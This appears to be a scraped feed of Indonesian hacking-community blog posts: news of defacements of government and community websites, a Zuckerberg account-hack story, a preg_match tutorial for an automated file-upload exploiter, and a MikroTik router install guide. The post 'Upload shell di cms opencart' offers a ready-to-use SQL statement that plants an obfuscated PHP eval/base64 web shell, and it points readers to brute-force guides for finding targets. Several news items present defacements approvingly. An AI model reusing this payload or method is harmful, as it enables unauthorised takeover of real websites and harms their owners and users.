Prihatin Kasus Razia Warung Makan, Situs Satpol PP Serang Dijebol Hacker

Pagi kali ini LinuxSec kembali mengabarkan aksi peretasan situs go.id. Setelah kemarin dinia maya ramai membicarakan tindakan Satpol PP Serang yang merazia secara paksa warung ibu ibu 50 tahun yang buka di bulan Ramadhan, hari ini hacker dengan kodenama Shor7cut meretas situs Satpol PP Serang.

Sang hacker tidak merubah frontal halaman situs atau merusaknya. Nah cukup ber-etika saya rasa.

Di judul artikel yang diupdate di situs tersebut pun cukup jelas :

PESAN SEORANG SHOR7CUT - BUKAN HACKED TAPI SUARA HATI

Nah berikut isi pesan yang ditinggalkan oleh shor7cut :

APA YANG SAYA RASAKAN INI BENAR-BENAR SAKIT , DIMANA SEORANG IBU UNTUK MENCARI REZEKY NAFKAH DI BULAN SUCI UNTUK HARI RAYA NANTI MALAH DI HALANGI OLEH SATPOL PP. BILA MEMANG INGIN MERAZIA YA MBOK JANGAN PILIH-PILIH , ITU RESTORAN DAN TOKO-TOKO LAIN KENAPA TIDAK DI TUTUP JUGA ? LOGIKA NYA DIMANA COBA ? SAYA HANYA SESEORANG YANG MENYUARAKAN SUARA HATI SAYA , JUJUR SAYA SENDIRI SANGAT SEDIH , SAAT IBU (PEMILIK WARUNG MAKAN) ITU MENANGGIS BENER" HATI SAYA SAKIT MELIHAT APARAT BERTINDAK TIDAK ADIL. INI BUKAN KEADILAN , INI MERUPAKAN PENIDASAN.  SILAHKAN BAPAK LIHAT VIDIO INI https://youtu.be/9soj-uoDGF8​ DETIK KE 00.04

HANYA LEWAT SITUS INI SAYA MENYUARAKAN CURAHAN HATI SAYA. SAYA HARAP KEDEPANYA TIDAK ADA KEJADIAN SEPERTI INI LAGI. 

SALAM SHOR7CUT

Untuk link nya bisa kalian baca disini :

http://satpolpp.serangkab.go.id/home/berita/55/pesan-seorang-shor7cut---bukan-hacked-tapi-suara-hati

Mirror :

http://zone-h.org/mirror/id/26381170

Sampai berita ini diturunkan masih belum ada perbaikan dari situs yang bersangkutan. Kita tunggu saja kelanjutan dari kasus ini akankah ada respon dari pihak Satpol PP Serang atau tidak.

Sekian berita pagi kali ini, selamat beraktifitas ( jack/lsc )

Read more

Mengambil kata menggunakan preg_match

Abis baca - baca thread lama gw di http://hacker-newbie.org/showthread.php?tid=20672
jadi terharuu..
ternyata udh 2 tahunan maenan exploiter.
sebelumnya gw ucapin byk2 terima kasih kepada bang sohai yang udah ngebimbing gw sejauh ini, bunglon_ijo yang ikut berjuang bersama - sama, rieqyns13 yang udah mau share scannernya.
dan buat lu semua yang udah mau baca tutor ini yang sebenarnya sih ngk terlalu berguna banget...


*Perhatikan kata demi kata yang tak bermakna ini.
sebelumnya mari baca - baca tentang preg_match dulu disini http://php.net/manual/en/function.preg-match.php

tapi disini ane cuma pengen share cara mengambil kata dengan preg_match.
untuk apasih ?

misalnya kita sedang membuat auto upload.
dan ternyata nama filenya menjadi random.
daripada susah - susah ngecek satu per satu secara manual, mending kita ambil aja nama file random itu dan kemudian cek.

mudah saja, misalnya disaat kita selesai upload, outputnya menjadi seperti ini.
"filename":"420331file.php" "message":"Your file has been uploaded"

oke, alurnya seperti ini.
upload -> dapet ouput -> ambil output

yaudah langsung saja.

setelah sudah mendapatkan nama filenya.
baru deh kita cek lagi menggunakan file_get_content atau curl, kemudian pakai preg_match lagi.
tapi karena ini tutor cuma untuk ngambil namanya aja,
yaudah segini aja.
ya mungkin ngk berarti sama sekali.

Tutorial membuat scanner/finder pada website

Correct me if i wrong.

Read more

Situs KPU Kepulauan Selayar Diretas Hacker Malaysia

Kembali lagi dengan LinuxSec mengabarkan kasus peretasan situs pemerintah dalam negeri. Kali ini yang jadi korban adalah situs KPU Kepulauan Selayar. Hacker yang menggunakan nick Harith101 ini berasal dari tim MalaysiaGOV Team.

Menurut mirror zone-h, situs yang berhasil diretas adalah sobdomain 

sidapil.kpu-kepulauanselayarkab.go.id

ppid.kpu-kepulauanselayarkab.go.id

Namun kemungkinan main domain

sidapil.kpu-kepulauanselayarkab.go.id juga diretas. hanya saja tidak bisa dimirrorkan karena sebelumnya telah diretas defacer dengan kodenama ID1OT.

Dari pantauan kami, nampaknya aksi peretasan kali ini hanya random deface tanpa maksud untuk menimbulkan konflik dengan Indonesia. Sehingga tidak perlu teman teman dari Indonesia menamnggapi berlebihan. Hal itu bisa dilihat di catatan mirror mereka dimana mereka juga meretas website website milik malaysia ( .my ) .

Saat berita ini diturunkan, situs KPU Kepulauan Selayar sedang suspend. Kemungkinan maintenance.

Namun kalian bisa melihat mirror nya disini :

KPU Kepulauan Selayar Hacked

Oke sekian berita malam hari ini, terimakasih. ( jack/lsc )

Read more

Upload shell di cms opencart

kali ini ane pengen bagiin tutor upload shell di website cms opencart.
work versi 2 keatas..

cari targetnya bisa pake bruteforce disini
http://blog.indoxploit.or.id/2016/06/deface-dengan-opencart-bruteforce-and.html

langsung aja ke videonya ..
https://www.youtube.com/watch?v=CA6BvEopCEo

a.sql

SELECT '<?php eval (gzinflate(base64_decode("bZBNasNADIX3hd5hGLqIoW4OUHvIpoVCIIV0F4KRbY09MD/C1gRC8d3rcWJooaCNvqenJ4RNH4TswDP6rqgHJV8fHzBB6qmKHhxushXJdcDozVP1eTh+Zd9Ls2sCXWf0/rF/O56klueTZEdVssvz81/hBrNkTVvnparGoYfR2GJbqzxX8uU/x5w7oR3xl6+DDmw6aFrqrgpxv1aHwQmH3Ie2pDCyQN/wlbB00bIhGHibRvIWGFRhPEUWi66NRZFSS73ypbvc5DHWzrAw7QwuYCOWkdT6m+kH"))); ?>' FROM `mouwaffek_table`

thx to spyhackerz.com

Read more

CEO of Facebook Mark Zuckerberg HACKED !!

CEO of Facebook Mark Zuckerberg's  Accounts(Twitter, Pinterest) Hacked! Password was revealed as...

 

The young man who runs the greatest social network and constantly realizes new efforts to establish greater safety to support its billion users security, He neglected to take his security serious and suffered an online breach in his online records.

This guy failed to secure his accounts resulting to BREACH IN SECURITY


Yes you guessed it , I am speaking about The CEO of Facebook  Mark Zuckerberg, who failed to secure his accounts causing his Twitter and Pinterest accounts compromised on Sunday.
These HACKERS group who came from Saudi Arabia, titled OurMine, accepted responsibility for the breach and take a guess on how they succeeded ?

Oh  before we go to how this was Mark Zuckerberg's LinkedIn password "dadada", which he also used for his other online accounts, the group informed us with a tweet.

 

This was possible all thanks to  LinkedIn DATA BREACH



 

Read more

Forum Komunitas BackBox Linux Indonesia Diretas

Pagi ini LinuxSec kembali mengabarkan kasus peretasan situs dalam negeri. Sekitar sejam yang lalu forum komunitas BackBox Linux Indonesia diretas defacer yang mengatasnamakan dirinya " IRCX ". BackBox Indonesia sendiri adalah komunitas pengguna BackBox Linux di Indonesia, dan forum mereka membahas tentang seluk beluk BackBox maupun tentang kegunaan auditing tools pada OS BackBox.

Nah situs bereka yang beralamat di backboxindonesia.or.id baru saja diretas. Defacer mengubah halaman depan situs menjadi background hitam dan tulisan "Stamped by IRCX" . Tidak ada pesan khusus. Sehingga bisa disimpulkan motifnya bukan disebabkan oleh konflik. Namun bisa dipastikan peretasnya orang Indonesia jika menilik dari backsound yang dipasang.

Namun nampaknya admmin dari Forum tersebut sangat tanggap, patut diapresiasi.

Saat ini forum mereka telah kembali normal.

Namun untuk mirror nya bisa dilihat disini :

http://www.zone-h.org/mirror/id/26368604

Update :

Kami sempat mewawancarai sysadmin dari forum yang bersangkutan, dan menurut klarifikasi dari beliau ini bukan aksi peretasan. Namun ttindakan yang dilakukan salahsatu "orang dalam" atau pengurus dari BackBox Indonesia sendiri. Entah apa tujuannya. Mengenai pelaku, sang sysadmin juga sudah mengantongi nama.

Sekian berita pagi ini, selamat menjalankan ibadah puasa. ( jack/lsc )

Read more

Website Official ICMI Diretas Anonymous

Setelah tadi pagi sempat geger mengenai pernyataan ICMI yang menginginkan Google dan YouTube diblokir, nampaknya pernyataan tersebut juga menyulut "kemarahan" dari aktivis undergroud tanah air. Malam ini, situs mereka diretas hacker yang mengatasnamakan Anonymous.

Title homepage situs yang beralamat di icmi.or.id tersebut berubah menjadi Hacked by Anonymous.

Dan salahsatu artikel di halaman ICMI 

www.icmi.or.id/blog/2016/06/icmi-desak-pemerintah-tutup-youtube-dan-google ,

Paragraf pertama disisipi pesan yang ditulis oleh si hacker.

Cuman security testing ringan

Dear bapak/ibu "Cendikiawan" ICMI, this is a friendly reminder. Improve your security first, baru ngomongin blokir Google.

Anonymous - Kota Cantik

Motif peretasannya cukup jelas. Sang hacker yang mengaku anonymous tersebut menyuruh pihak ICMI untuk mengupdate keamanan mereka terlebih dahulu, baru membahas pemblokiran Google.

Sampai berita ini diturunkan, belum ada perbaikan di website tersebut.

Read more

Instal MikroTik Cloud Hosted Router di VMware Workstation 12

Pada kesempatan ini saya ingin share tutorial cara instal cloud hosted router di vmware workstation 12. Pada kesempatan sebelumnya sudah saya tulis overview mengenai Cloud Hosted Router [MikroTik] silahkan dibaca sendiri apabila anda belum begitu mengerti mengenai CHR itu apa? 

Kalau saya sendiri belajar produk ini sebenarnya hanya ingin coba simulasi CHR dan coba fitur The Dude MikroTik, sudah tau lah ya kalau The Dude itu tidak bisa diinstal pada semua versi RouterOS maupun Routerboard MikroTik. Karena saya tidak punya license RouterOS dan RB yang support The Dude ya wis, pakai CHR aja. Setelah mengerti produk CHR MikroTik ini saya jadi bisa simulasi The Dude pada Cloud Hosted Router Mikrotik.

Begitulah sedikit cerita, background saya belajar CHR MikroTik. Baik, sekarang saya share bagaimana Instal CHR MikroTik di VMware Workstation?

Software yang perlu dipersiapkan:

a. Installed VMware Workstation

b. VMware disk CHR

Selanjutnya langkah-langkah instalasinya:

1. Silahkan download vmdk CHR nya disini. File Vmdk tersebut versi RouterOS 6.35.2 (stable)
2. Buka aplikasi VMware Workstation-nya, lalu Create virtual machine, selanjutnya pilih "Custom (advanced)":

3. Next terus sampai pada langkah dibawah ini... Pilih "Use an existing virtual disk" - next

4. Cari letak dimana file .vmdk yang sudah didownload tadi, - next

5. Berikut detail virtual machine yang sudah saya buat.

 6. Jalankan virtual machine CHR-nya.

Nah,,, jadi to VM CHR-nya. Silahkan dilanjutkan sendiri, atau diremote menggunakan Winbox. Saya hanya bisa menemani sampai pada bagian tersebut. Selanjutnya silahkan dilanjutkan sendiri untuk konfigurasinya... Terimakasih, semoga membantu.

NB: Capture lengkapnya bisa dilihat DISINI.

Read more